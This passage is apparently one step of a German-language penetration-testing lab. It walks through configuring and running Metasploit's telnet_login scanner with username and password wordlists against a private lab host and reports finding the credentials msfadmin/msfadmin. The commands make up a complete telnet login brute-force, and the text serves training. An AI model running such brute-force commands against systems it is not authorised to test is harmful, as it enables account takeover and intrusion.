In diesem Schritt werden wir das Metasploit-Modul mit dem Zielhost, dem Benutzernamen-Wörterbuch und dem Passwort-Wörterbuch konfigurieren.
Zunächst sollten Sie, wenn Sie nicht in der Metasploit-Konsole sind, die Metasploit-Konsole starten:
cd ~
msfconsole
Verwenden Sie das Modul auxiliary/scanner/telnet/telnet_login
:
use auxiliary/scanner/telnet/telnet_login
Legen Sie den Zielhost fest:
set RHOSTS 192.168.122.102
Legen Sie die Datei für das Benutzernamen-Wörterbuch fest:
set USER_FILE /username.txt
Legen Sie die Datei für das Passwort-Wörterbuch fest:
set PASS_FILE /password.txt
Abschließend führen Sie den Exploit aus:
exploit
Metasploit beginnt, verschiedene Benutzernamen- und Passwortkombinationen aus den angegebenen Wörterbüchern zu testen. Wenn gültige Anmeldeinformationen gefunden werden, werden sie in Grün angezeigt.
In diesem Fall sind die gültigen Anmeldeinformationen msfadmin/msfadmin
.
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung